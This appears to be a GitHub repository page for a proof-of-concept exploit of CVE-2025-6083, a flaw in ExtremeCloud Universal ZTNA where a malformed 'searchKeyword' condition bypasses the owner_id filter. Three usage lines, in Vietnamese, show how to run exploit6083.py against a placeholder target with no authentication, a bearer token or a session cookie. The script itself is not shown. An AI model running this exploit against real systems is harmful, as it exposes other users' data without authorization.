- Nếu không cần xác thực python3 exploit6083.py --url https://ztna.target.com --search admin
- Dùng Bearer Token python3 exploit6083.py --url https://ztna.target.com --search admin --auth-token abcdef123456
- Dùng cookie thủ công python3 exploit6083.py --url https://ztna.target.com --search admin --cookie "PHPSESSID=xyz; user=admin"
-
Notifications
You must be signed in to change notification settings - Fork 0
In ExtremeCloud Universal ZTNA, a syntax error in the 'searchKeyword' condition caused queries to bypass the owner_id filter. This issue may allow users to search data across the entire table instead of being restricted to their specific owner_id.
Yuri08loveElaina/CVE_2025_6083
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
About
In ExtremeCloud Universal ZTNA, a syntax error in the 'searchKeyword' condition caused queries to bypass the owner_id filter. This issue may allow users to search data across the entire table instead of being restricted to their specific owner_id.
Topics
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published